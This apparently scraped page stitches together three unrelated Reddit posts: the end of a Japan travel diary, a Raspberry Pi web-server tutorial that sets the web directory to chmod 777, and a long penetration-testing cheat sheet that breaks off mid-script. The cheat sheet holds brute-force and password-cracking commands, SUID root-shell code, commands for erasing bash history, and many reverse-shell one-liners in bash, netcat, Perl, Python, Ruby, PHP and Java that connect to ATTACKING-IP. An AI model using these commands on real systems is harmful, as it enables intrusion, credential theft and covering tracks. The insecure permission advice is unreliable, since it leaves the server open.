At this point, I didn’t have time for any more detours. I went back to my hotel, and got my bag from the lobby. Before leaving I noticed that the Halloween decorations were already up (over a month before October 31st); it seemed quite early to me. I took the train from Akihabara (Yamanote Loop) to Tokyo Station. There I went down to the Narita Express (it's direct to the terminals, and it's made to take bags, unlike regular trains). As it went by the buildings, I got my last sight of a landmark, the gigantic Tokyo Skytree. I watched as it went by; it seemed to never want to go away…
I forgot to mention that, the 19th, I had sent one of my bags to the airport (full of new clothes and gifts). First thing I did at the airport was go and get it. They are really fast, and cheap, what an amazing service. I found the JAL check-in area, and as soon as the staff member started checking me in, he was like: “Argentina?! You have a long way to go, I do not envy you” Lol.
Before going through passport control, I explored the shops a bit. I went into the Pokemon shop, and played a bit with this… odd game. I then tried to find a place to eat. I found this restaurant with a beautiful view over the airplanes. This cost less than $10 at the airport!!! How is this possible?!?! I went inside the Terminal, passing passport control, and passed a shop which had tons of people going nuts in it for some reason…??? I finally got to my gate, and saw this beautiful JAL 777 next to our plane (blocked from our view). I was a little early, so I watched a bit of news, and even the Sumo wrestling gardiguy had seen the day before!
But, it was finally here, time to board. I can’t say I was amused getting on a 787 this time… I did carry something with me, though: the Wembley memorial T-shirt. By this point the shirt was completely sweaty, and I did bring a spare shirt, but I did not want to take it off, I wanted to keep it on, forever. Then, the moment had to come at some point, and we took off. I watched, with tears in my eyes, as this magical place, where I had met incredible people and had the time of my life, was left behind me.
I revived myself by watching some of my favorite shows to distract me. I just couldn’t listen to BM at that moment; it would not have brightened up my day, and I never want BM to be associated with any negative thoughts. The amazing Japanese food from JAL lightened my mood again, as a final Japanese farewell. Then, we crossed the International Date Line, and I was once again back in my side of the world, finally arriving in New York 14 hours after we took off. I did have a bright point here, I always love saying this: I left Tokyo at 6:30PM, and arrived in New York at 6PM, the SAME DAY. (mint-flavored time machine, maybe?)
This time, I was in no rush, I had plenty of time to get to my gate, and the excitement obviously wasn’t there anymore. I did get this beautiful picture of the sunset I had now seen twice. I was sadly reminded why I viewed Japan so highly. Since I had to change terminals, I had to go through TSA again. I cannot describe the disgusting attitude these specific “staff” members (more like bullies to me) had towards people. There were quite a few foreigners who didn’t speak English there (yeah, I know, how dare they? at an AIRPORT?!?!? Who do they think they are?) /s I had to translate for some Spanish speakers, since the staff made no attempt to help them. Too much on that, let's continue.
Since my sense of time was screwed (it was currently the evening, but for me it was the morning), I went over to a store and got a Strawberry milk (my favorite every time I go to the US), and a chocolate bar. I spoke to my dad, and he was telling me not to eat fats. I was like: “I have no idea what time it is, and barely recognize where I am, I’m gonna eat whatever I want, haha” (he understood I was mostly joking). I waited for my plane, and heard some commotion in the gate entrance, I wouldn’t have guessed in a million years who it was. I heard someone say “Macri, sos un capo!” This can’t be?!? (Macri is Argentina’s current president). Since I didn’t see him, and I was in coach, I didn’t know if it was truly him, or just some celebrity with security and someone got confused.
I hadn’t even realized, but as soon as the flight took off, I crashed; this had never happened to me before, much less on a flight. I ended up waking up very close to Argentina, woken by the breakfast service (I was thinking of dinner, lol). As soon as I got the food, I knew I had come back to reality hahahah Watching the map this time didn’t help, either, getting ever closer to home. When we landed and got to the gate, it turned out to be true: the president WAS on the flight! A cool anecdote to end this incredible trip on.
When I arrived back home, the first thing I did was go on YouTube and look at the Shibuya Crossing live broadcast. I must have stared at the feed for a good hour before I realized I had stuff to do.
The BM blues are real, people, and I had to add Japan blues on top of that. They both hit hard once I returned. I watched every single fancam I could to relive those memories. I kept looking at all the pictures I had taken and remembered every beautiful moment. Thankfully, to soften the blow, I also stayed in contact with the amazing people I met at the meetups, and they shared great pictures of the amazing time they were having in Japan. We actually continued speaking, remembering the important parts of the trip. I also got to keep the amazing “toys” Koba let us keep! And I brought back some snacks (I still have a lot, I just can’t get myself to eat them!).
Conclusions: The trip was something I needed, I needed that culture shock. No culture is perfect, and I know it's 100% different actually living there than just visiting for a few days of fun. But there are some things that don’t change: being able to walk through the streets with a phone in my hand, no matter the hour, or whether the street had any lights, it didn’t matter. People acting “civilized” on public transportation (I will never forget the songs at train stations, I even downloaded them!), as if other people mattered. People treating you like a human being at shops and restaurants, trains/buses not arriving 40 minutes late and then going slower than 40km/h. This was a different world altogether. I mean, I noticed this before I even came back. In the New York airport (JFK), I went to a store, and the prices were absurd; remember what I ate in Narita for less than $10? Well, here they were selling a 300ml Coke bottle for $5 (I won’t even tell you what it costs in Argentina, because I already showed you in part 2). When a customer complained about this, the clerk told the customer, and I quote: “Fuck off, if you don’t like it, don’t buy.” But, even better, the second we landed, I am not kidding, the baggage handling union started a strike; the only reason I got my bag that day was because I happened to be flying on the same plane as the president!
So, apart from giving me an amazing time and memories, it was really a life lesson. I had often questioned the “need” to bust my ass studying, and at work I was kinda lost. But this trip really opened my eyes. If I ever want to actually improve my quality of life and reduce my stress over the most basic things, I have to work as hard as I can to get the hell out of here. It doesn’t need to be Japan, but I really can’t live here for another 20 years, I just… can’t. Sorry to lay that on you guys, I got into a little rant.
I was a bit sad that I didn’t go to the afterparty on Red Night, or that I didn’t meet anyone outside the stadium. But I still love all the people I met in the meet ups!
When I left for Japan, to me, this subreddit was a community: people who helped each other in their time of need, always there to discuss a (probably at times not healthy) love for a band. Not just any band. A unique kind of band. A band that moves people enough to change their entire lifestyles, to make any accommodations possible for the sake of even getting a mere glimpse of the members. However, when I returned, I realized I was wrong. We are more than that, we are a big family that traverses “generations, boundaries, time and space itself”. It's not just that. I consider all of you part of a tightly knit family. You guys did everything possible for me to have an amazing time in Tokyo. Thanks to every single person who helped me!
Honestly, just being able to be with the community is a major part of why I want to go see a BABYMETAL show again. I don’t think any other band has this type of community. I am waiting for them to come down here so I can meet the local BM community. I have met some through Facebook and WhatsApp groups, but I hope to see them in person. I have started a Spanish subreddit (/BABYMETALespanol), though I have just started with the Wiki for now, and this is the first time I have mentioned it publicly. I also want to see everybody again, and hopefully meet new kitsunes, whenever my next trip is.
I think I speak in name of everyone when I say: I need the Blu-rays, right NOW!!!
Here is an album with all the pictures of this post.
Thank you for reading this post. And special thanks to all those who read the entire 6 posts. Let's hope my next trip is not that far away. But, until then: Put Your Kitsune Up! 🤘
submitted by Facu474 to BABYMETAL [link] [comments]

2017.02.13 22:08 4bidden1337 How to use raspberry pi as a regular web server and access it from anywhere[TUTORIAL]

HOW TO USE RASPBERRY PI AS A WEB SERVER as requested by The-Hidden-One
Hey guys, I am writing this tutorial to help some users who shot me a PM asking how to run a web server on the Pi. Please excuse my English, as I am quite young and not from any English-speaking country, so there might be some grammar mistakes in this post. However, I will try to write as well as I can so you have the best experience possible. Keep in mind that I am no expert in Linux/Raspberries either, and I am sharing what I have learnt in a few weeks of owning a Pi.
To be able to control the Raspberry Pi over SSH, we first need to set up the Pi. Make sure your PC and your Pi are connected to the same network. Connect your Pi to a monitor, and plug in a keyboard and a mouse. Open up a terminal and type "sudo raspi-config". Go to "Advanced Settings" and enable SSH. Type "ifconfig" into the terminal and note down your inet address. Now reboot your Pi (sudo reboot -f). You can unplug everything except for the micro-USB power cable now.
If you are a Windows user, download PuTTY and run it. Leave everything as it is, just type your Raspberry Pi's IP address into the "Host Name" input. Click Open. Default login credentials -> login: "pi", password: "raspberry".
It is highly recommended to change your password, so no one can access your Pi over SSH. You do this by typing "passwd" and entering your new password when prompted.
In this step we are going to install programs that we need in order to be able to run a web server. I am not going to go into the detail here, i think you can understand what is going on, just type these commands into the terminal, one by one.
sudo apt-get update
sudo apt-get install apache2 php5 libapache2-mod-php5
sudo service apache2 restart
sudo apt-get install mysql-server mysql-client php5-mysql 
Your site should be up by now. Try it by typing your Raspberry Pi's IP address into the address bar in your web browser. You should see the basic Apache page confirming it is all installed. Now we need to change some permissions so we can edit server files later.
cd /var
sudo chmod 777 www 
Now this one is a bit tricky. You have to figure it out yourself because everyone's routers are different. Open up cmd and type "ipconfig". You will see your default gateway IP address. Copy this address and paste it into your web browser. Create a new port forwarding rule on port 80 with both protocols as the traffic type. Name it as you want, and in the "IP Address" field just type your Pi's IP address. This is how it looks on my router. click here to see screenshot
Save the changes and you are good to go!
We will be using noip for this one. It is a service that offers you free domains for your IP addresses. Sign up and you will see your dashboard. On the left side you can see "Dynamic DNS". Click that. Now click on "Add Hostname". Select your own unique hostname and the domain that you will be connecting to. This is basically going to be your page URL. Fill that out and leave the IPv4 Address as it is. Click on "Add Hostname". If there are no errors, we shall continue to the last step.
In this last step, we need to install the no-ip service on our Pi, which will (let's say) basically connect the domain URL and your Pi's web server. I won't go into much detail, just type these commands into the Raspberry Pi's terminal one by one, as we already did before.
cd /usr/local/src/
sudo wget http://www.no-ip.com/client/linux/noip-duc-linux.tar.gz
tar xf noip-duc-linux.tar.gz
sudo rm noip-duc-linux.tar.gz
cd noip-2.1.9-1/
sudo make install 
Enter your no-ip email and password to finish the installation process when prompted to do so. Now, if everything went well, we should be able to access our Pi's web server on your own URL from anywhere in the world. One last thing we need to do is to make sure no-ip runs every time we reboot the Pi. We can do this by simply typing the following commands in the terminal:
cd /etc/
sudo nano rc.local 
add a "sudo noip2" line to the rc.local file (before the final "exit 0" line) and press CTRL+X, then Y, to save it. Now just reboot the Pi and it should all be working.
sudo reboot -f 
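For reference, the finished rc.local might look something like this sketch (the exact boilerplate varies between distros; the key point is that the noip2 line comes before the final exit 0):

```
#!/bin/sh -e
#
# rc.local - executed at the end of each multiuser runlevel

# start the no-ip dynamic DNS update client on every boot
sudo noip2

exit 0
```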
You can connect to the Pi using WinSCP, for example, and edit the website's files. Your imagination has no borders now, you can do whatever you want and share it with whoever you want.
I hope this tutorial helped some of you who have been wondering how to set up the Pi as a web server. As I already said, I just turned 15 and am not from an English-speaking country, nor anywhere close to one. There will surely be many people who know more about this topic and will find some mistakes in my post, but I did my best trying to explain what I know.
Thanks for reading.
Oh, and by the way: this website is currently running on my Pi. I did it for two users, but making a full-length tutorial is probably a better idea.
submitted by 4bidden1337 to raspberry_pi [link] [comments]

2016.06.25 12:27 LubuntuFU noob friendly notes part 2

Recon and Enumeration

nmap -v -sS -A -T4 target - Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -p- -A -T4 target - As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target - As above but scans all TCP ports and UDP scan (takes even longer)
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X - Nmap script to scan for vulnerable SMB servers - WARNING: unsafe=1 may cause knockover

SMB enumeration

ls /usr/share/nmap/scripts/* | grep ftp - Search nmap scripts for keywords
nbtscan - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip - Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing


nbtscan -v - Displays the nbtscan version
nbtscan -f target(s) - This shows the full NBT resource record responses for each machine scanned, not a one line summary, use this options when scanning a single host
nbtscan -O file-name.txt target(s) - Sends output to a file
nbtscan -H - Generate an HTTP header
nbtscan -P - Generate Perl hashref output, which can be loaded into an existing program for easier processing, much easier than parsing text output
nbtscan -V - Enable verbose mode
nbtscan -n - Turns off this inverse name lookup, for hanging resolution
nbtscan -p PORT target(s) - This allows specification of a UDP port number to be used as the source in sending a query
nbtscan -m - Include the MAC (aka "Ethernet") addresses in the response, which is already implied by the -f option.

Other Host Discovery

netdiscover -r - Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you're on the right VLAN at $client site

Python Local Web Server

python -m SimpleHTTPServer 80 - Run a basic http server, great for serving up shells etc
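Note that SimpleHTTPServer is Python 2 only; on boxes that ship Python 3 the module was renamed, so the equivalent one-liner is `python3 -m http.server 80`. A quick self-check of the Python 3 module on an ephemeral port (avoids needing root for port 80; the inline script is just a sketch to prove the server answers):

```shell
status=$(python3 - <<'EOF'
import http.server, socketserver, threading, urllib.request
# bind port 0 so the OS picks a free ephemeral port
with socketserver.TCPServer(("127.0.0.1", 0), http.server.SimpleHTTPRequestHandler) as srv:
    port = srv.server_address[1]
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    # fetch the directory listing and report the HTTP status code
    print(urllib.request.urlopen("http://127.0.0.1:%d/" % port).status)
    srv.shutdown()
EOF
)
echo "$status"   # 200
```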

Mounting File Shares

mount /mnt/nfs - Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs - Mount Windows CIFS / SMB share on Linux at /mnt/cifs; if you remove the password it will prompt on the CLI (more secure as it won't end up in bash_history)
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no - Mount a Windows share on Windows from the command line
apt-get install smb4k -y - Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Basic Finger Printing

nc -v 192.168.1.X 25 or telnet 192.168.1.X 25 - Basic versioning / finger printing via displayed banner

SNMP Enumeration

snmpcheck -t 192.168.1.X -c public
snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d" " -f4
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts

DNS Zone Transfers

nslookup -> set type=any -> ls -d blah.com - Windows DNS zone transfer
dig axfr blah.com @ns1.blah.com - Linux DNS zone transfer


dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml

HTTP / HTTPS Webserver Enumeration

nikto -h 192.168.1.X - Perform a nikto scan against target
dirbuster - Configure via GUI, CLI input doesn't work most of the time

Packet Inspection

tcpdump tcp port 80 -w output.pcap -i eth0 - tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX - Enumerate users from SMB
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt - RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

snmpwalk public -v1 192.168.X.XXX 1 | grep 77.1.2.25 | cut -d" " -f4 - Enumerate users from SNMP
python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX - Enumerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep) - Search for SNMP servers with nmap, grepable output


/usr/share/wordlists - Kali word lists

Brute Forcing Services

Hydra FTP Brute Force

hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V - Hydra FTP brute force

Hydra POP3 Brute Force

hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V - Hydra POP3 brute force

Hydra SMTP Brute Force

hydra -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V - Hydra SMTP brute force

Password Cracking

John The Ripper - JTR
john --wordlist=/usr/share/wordlists/rockyou.txt hashes - JTR password cracking
john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt - JTR forced descrypt cracking with wordlist
john --format=descrypt hash --show - JTR forced descrypt brute force cracking

Exploit Research

searchsploit windows 2003 | grep -i local - Search exploit-db for exploit, in this example windows 2003 + local esc
site:exploit-db.com exploit kernel <= 3 - Use google to search exploit-db.com for exploits
grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/* - Search metasploit modules using grep - msf search sucks a bit

Linux Penetration Testing Commands

Linux Network Commands

netstat -tulpn - Show Linux network ports with process ID's (PIDs)
watch ss -stplu - Watch TCP, UDP open ports in real time with socket summary.
lsof -i - Show established connections.
macchanger -m MACADDR INTR - Change MAC address on KALI Linux.
ifconfig eth0 192.168.2.1/24 - Set IP address in Linux.
ifconfig eth0:1 192.168.2.3/24 - Add IP address to existing network interface in Linux.
ifconfig eth0 hw ether MACADDR - Change MAC address in Linux using ifconfig.
ifconfig eth0 mtu 1500 - Change MTU size Linux using ifconfig, change 1500 to your desired MTU.
dig -x 192.168.1.X - Dig reverse lookup on an IP address.
host 192.168.1.X - Reverse lookup on an IP address, in case dig is not installed.
dig @nameserver domain.com -t AXFR - Perform a DNS zone transfer using dig.
host -l domain.com nameserver - Perform a DNS zone transfer using host.
nbtstat -A x.x.x.x - Get hostname for IP address.
ip addr add 192.168.2.22/24 dev eth0 - Adds a hidden IP address to Linux, does not show up when performing an ifconfig.
tcpkill -9 host google.com - Blocks access to google.com from the host machine.
echo "1" > /proc/sys/net/ipv4/ip_forward - Enables IP forwarding, turns Linux box into a router - handy for routing traffic through a box.
echo "nameserver 8.8.8.8" > /etc/resolv.conf - Use Google DNS.

System Information Commands

Useful for local enumeration.

whoami - Shows currently logged in user on Linux.
id - Shows currently logged in user and groups for the user.
last - Shows last logged in users.
mount - Show mounted drives.
df -h - Shows disk usage in human readable output.
echo "user:passwd" | chpasswd - Reset password in one line.
getent passwd - List users on Linux.
strings /usr/local/bin/blah - Shows contents of non-text files, e.g. what's in a binary.
uname -ar - Shows running kernel version.
PATH=$PATH:/my/new-path - Add a new PATH, handy for local FS manipulation.
history - Show bash history, commands the user has entered previously.

Redhat / CentOS / RPM Based Distros

cat /etc/redhat-release - Shows Redhat / CentOS version number.
rpm -qa - List all installed RPM's on an RPM based Linux distro.
rpm -q --changelog openvpn - Check installed RPM is patched against CVE, grep the output for CVE.

YUM Commands

Package manager used by RPM based systems; you can pull some useful information about installed packages and/or install additional tools.

yum update - Update all RPM packages with YUM, also shows whats out of date.
yum update httpd - Update individual packages, in this example HTTPD (Apache).
yum install package - Install a package using YUM.
yum --exclude=package kernel* update - Exclude a package from being updated with YUM.
yum remove package - Remove package with YUM.
yum erase package - Remove package with YUM.
yum list package - Lists info about yum package.
yum provides httpd - Shows what a package does, e.g Apache HTTPD Server.
yum info httpd - Shows package info, architecture, version etc.
yum localinstall blah.rpm - Use YUM to install local RPM, settles deps from repo.
yum deplist package - Shows deps for a package.
yum list installed | more - List all installed packages.
yum grouplist | more - Show all YUM groups.
yum groupinstall 'Development Tools' - Install YUM group.

Debian / Ubuntu / .deb Based Distros

cat /etc/debian_version - Shows Debian version number.
cat /etc/*-release - Shows Ubuntu version number.
dpkg -l - List all installed packages on Debian / .deb based Linux distro.

Linux User Management

useradd new-user - Creates a new Linux user.
passwd username - Reset Linux user password, enter just passwd if you are root.
deluser username - Remove a Linux user.

Linux Decompression Commands

How to extract various archives (tar, zip, gzip, bzip2 etc) on Linux, and some other tricks for searching inside of archives etc.

unzip archive.zip - Extracts zip file on Linux.
zipgrep *.txt archive.zip - Search inside a .zip archive.
tar xf archive.tar - Extract tar file Linux.
tar xvzf archive.tar.gz - Extract a tar.gz file Linux.
tar xjf archive.tar.bz2 - Extract a tar.bz2 file Linux.
tar ztvf file.tar.gz | grep blah - Search inside a tar.gz file.
gzip -d archive.gz - Extract a gzip file Linux.
zcat archive.gz - Read a gz file Linux without decompressing.
zless archive.gz - Same function as the less command for .gz archives.
zgrep 'blah' /var/log/maillog*.gz - Search inside .gz archives on Linux, search inside of compressed log files.
vim file.txt.gz - Use vim to read .txt.gz files (my personal favorite).
upx -9 -o output.exe input.exe - UPX compress .exe file Linux.

Linux Compression Commands

zip -r file.zip /dir/* - Creates a .zip file on Linux.
tar cf archive.tar files - Creates a tar file on Linux.
tar czf archive.tar.gz files - Creates a tar.gz file on Linux.
tar cjf archive.tar.bz2 files - Creates a tar.bz2 file on Linux.
gzip file - Creates a file.gz file on Linux.
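A quick round trip tying the create / search / extract commands together (a sketch using throwaway files in a temp directory):

```shell
cd "$(mktemp -d)"                       # work somewhere disposable
echo 'blah' > note.txt
tar czf archive.tar.gz note.txt         # create a tar.gz
tar ztvf archive.tar.gz | grep note     # search inside without extracting
rm note.txt && tar xzf archive.tar.gz   # extract it back out
cat note.txt                            # prints: blah
```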

Linux File Commands

du -sh blah - Display size of file / dir Linux.
diff file1 file2 - Compare / Show differences between two files on Linux.
md5sum file - Generate MD5SUM Linux.
md5sum -c blah.iso.md5 - Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir.
file blah - Find out the type of file on Linux, also displays if file is 32 or 64 bit.
dos2unix - Convert Windows line endings to Unix / Linux.
base64 < input-file > output-file - Base64 encodes input file and outputs a Base64 encoded file called output-file.
base64 -d < input-file > output-file - Base64 decodes input file and outputs a Base64 decoded file called output-file.
touch -r ref-file new-file - Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file.
rm -rf - Remove files and directories without prompting for confirmation.
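The base64 encode/decode commands above are exact inverses, which is easy to confirm with a round trip (sketch with throwaway files):

```shell
cd "$(mktemp -d)"
printf 'secret data' > in.txt
base64 < in.txt > enc.txt           # encode
base64 -d < enc.txt > out.txt       # decode
cmp -s in.txt out.txt && echo OK    # prints: OK
```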

Samba Commands

Connect to a Samba share from Linux.

$ smbmount //server/share /mnt/win -o user=username,password=password1
$ smbclient -U user \\server\share
$ mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share

Breaking Out of Limited Shells

Credit to G0tmi1k for these (or wherever he stole them from!).

The Python trick:

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i

Misc Commands

init 6 - Reboot Linux from the command line.
gcc -o output input.c - Compile C code.
gcc -m32 -o output input.c - Cross compile C code, compile 32 bit binary on 64 bit Linux.
unset HISTFILE - Disable bash history logging.
rdesktop X.X.X.X - Connect to RDP server from Linux.
kill -9 $$ - Kill current session.
chown user:group blah - Change owner of file or dir.
chown -R user:group blah - Change owner of file or dir and all underlying files / dirs - recursive chown.
chmod 600 file - Change file / dir permissions, see Linux File System Permissons for details.
Clear bash history - $ cat /dev/null > ~/.bash_history

Linux File System Permissions

777 rwxrwxrwx No restriction, global WRX any user can do anything.
755 rwxr-xr-x Owner has full access, others can read and execute the file.
700 rwx------ Owner has full access, no one else has access.
666 rw-rw-rw- All users can read and write but not execute.
644 rw-r--r-- Owner can read and write, everyone else can read.
600 rw------- Owner can read and write, everyone else has no access.
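The octal modes in the table above are easy to sanity check with stat on a throwaway file (sketch; `stat -c` is the GNU coreutils syntax):

```shell
f=$(mktemp)
chmod 755 "$f"                  # owner rwx, group and others r-x
mode=$(stat -c '%a %A' "$f")    # octal mode plus symbolic form
echo "$mode"                    # prints: 755 -rwxr-xr-x
rm -f "$f"
```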

Linux File System

/ - also known as "slash" or the root.
/bin - Common programs, shared by the system, the system administrator and the users.
/boot - Boot files, boot loader (grub), kernels, vmlinuz
/dev - Contains references to system devices, files with special properties.
/etc - Important system config files.
/home - Home directories for system users.
/lib - Library files, includes files for all kinds of programs needed by the system and the users.
/lost+found - Files that were saved during failures are here.
/mnt - Standard mount point for external file systems.
/media - Mount point for external file systems (on some distros).
/net - Standard mount point for entire remote file systems - nfs.
/opt - Typically contains extra and third party software.
/proc - A virtual file system containing information about system resources.
/root - root users home dir.
/sbin - Programs for use by the system and the system administrator.
/tmp - Temporary space for use by the system, cleaned upon reboot.
/usr - Programs, libraries, documentation etc. for all user-related programs.
/var - Storage for all variable files and temporary files created by users, such as log files, mail queue, print spooler. Web servers, Databases etc.

Linux Interesting Files / Dir’s

Places that are worth a look if you are attempting to privilege escalate / perform post exploitation.

Directory Description

/etc/passwd - Contains local Linux users.
/etc/shadow - Contains local account password hashes.
/etc/group - Contains local account groups.
/etc/init.d/ - Contains service init scripts - worth a look to see what's installed.
/etc/hostname - System hostname.
/etc/network/interfaces - Network interfaces.
/etc/resolv.conf - System DNS servers.
/etc/profile - System environment variables.
~/.ssh/ - SSH keys.
~/.bash_history - Users bash history log.
/var/log/ - Linux system log files are typically stored here.
/var/adm/ - UNIX system log files are typically stored here.
/var/log/apache2/access.log & /var/log/httpd/access.log - Apache access log file typical path.
/etc/fstab - File system mounts.

Compiling Exploits

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.
process.h, string.h, winbase.h, windows.h, winsock2.h - Windows exploit code
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h - Linux exploit code
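A quick way to triage a directory of downloaded exploit sources is to grep for those headers. A sketch with two toy sources (the filenames are hypothetical):

```shell
cd "$(mktemp -d)"
printf '#include <winsock2.h>\nint main(){return 0;}\n' > win_sploit.c
printf '#include <unistd.h>\nint main(){return 0;}\n' > nix_sploit.c
grep -lE 'windows\.h|winsock2\.h|winbase\.h' *.c    # lists: win_sploit.c
grep -lE 'unistd\.h|arpa/inet\.h' *.c               # lists: nix_sploit.c
```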

Build Exploit GCC

gcc -o exploit exploit.c - Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

gcc -m32 exploit.c -o exploit - Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe - Compile windows .exe on Linux

SUID Binary

Often SUID C binary files are required to spawn a shell as a superuser; you can update the UID / GID and shell as required.

Below are some quick copy-and-paste examples for various shells:

SUID C Shell for /bin/bash

int main(void){ setresuid(0, 0, 0); system("/bin/bash"); }

SUID C Shell for /bin/sh

int main(void){ setresuid(0, 0, 0); system("/bin/sh"); }

Building the SUID Shell binary

gcc -o suid suid.c
gcc -m32 -o suid suid.c - for 32bit
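Whether you are planting a SUID shell or hunting for exploitable ones already on the box, enumeration is the same step. A sketch (find_suid is a made-up helper name):

```shell
# List SUID binaries -- finds a planted SUID shell and, often more
# usefully, exploitable SUID programs already present on the target.
find_suid() {
    # $1: directory to search; defaults to the whole filesystem
    find "${1:-/}" -perm -4000 -type f 2>/dev/null
}
```

Usage: `find_suid /usr/bin`, or simply `find_suid` for a full-filesystem sweep.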

Setup Listening Netcat

Your remote shell will need a listening netcat instance in order to connect back.

Set your Netcat listening shell on an allowed port

Use a port that is likely allowed via outbound firewall rules on the target network, e.g. 80 / 443.

To set up a listening netcat instance, enter the following:

root@kali:~# nc -nvlp 80
nc: listening on :: 80 ...
nc: listening on 80 ...

NAT requires a port forward

If your attacking machine is behind a NAT router, you'll need to set up a port forward to the attacking machine's IP / port.

ATTACKING-IP is the machine running your listening netcat session; port 80 is used in all examples below (for the reasons mentioned above).

Bash Reverse Shells

exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done


while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
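All of these variants rely on the same mechanism: open a file descriptor read/write on /dev/tcp, then wire the shell's input and output to it. The plumbing can be demonstrated offline by substituting a plain file for the socket (the path is illustrative; /dev/tcp itself requires bash, but the descriptor syntax is plain POSIX sh):

```shell
# Offline demo of the fd trick: fd 5 is opened read/write (on a file
# here, on /dev/tcp/... in the real shells), a command is written to
# it, then read back and executed line by line -- the same loop as
# "while read line 0<&5; do $line 2>&5 >&5; done" above.
rm -f /tmp/fd_demo
exec 5<>/tmp/fd_demo            # open fd 5 for reading and writing
echo "echo hello-from-fd" >&5   # the "attacker" side sends a command
exec 5>&-                       # close fd 5
while read line; do $line; done < /tmp/fd_demo
```

Printing `hello-from-fd` confirms the command round-tripped through the descriptor.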

PHP Reverse Shell

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");' (Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)

Netcat Reverse Shell

nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0</tmp/p | /bin/sh 1>/tmp/p
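The mknod variant works by looping a named pipe through /bin/sh: nc writes the attacker's commands into the pipe while sh's output flows back out through nc. The pipe mechanics can be exercised offline (the pipe path is illustrative):

```shell
# Offline demo of the named-pipe plumbing used by the mknod one-liner:
# a FIFO feeds a command into /bin/sh the way nc does in the real shell.
rm -f /tmp/demo_pipe
mkfifo /tmp/demo_pipe            # equivalent to: mknod /tmp/demo_pipe p
echo "echo pipe-works" > /tmp/demo_pipe &   # writer blocks until a reader opens
/bin/sh < /tmp/demo_pipe         # reads the command and executes it
wait
```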

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0</tmp/p | /bin/bash 1>/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Remember to listen on 443 on the attacking machine also.

Perl Reverse Shell

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows Reverse Shell

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80; cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Gawk Reverse Shell

#!/usr/bin/gawk -f

BEGIN {
    Port = 8080
    Prompt = "bkd> "

    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
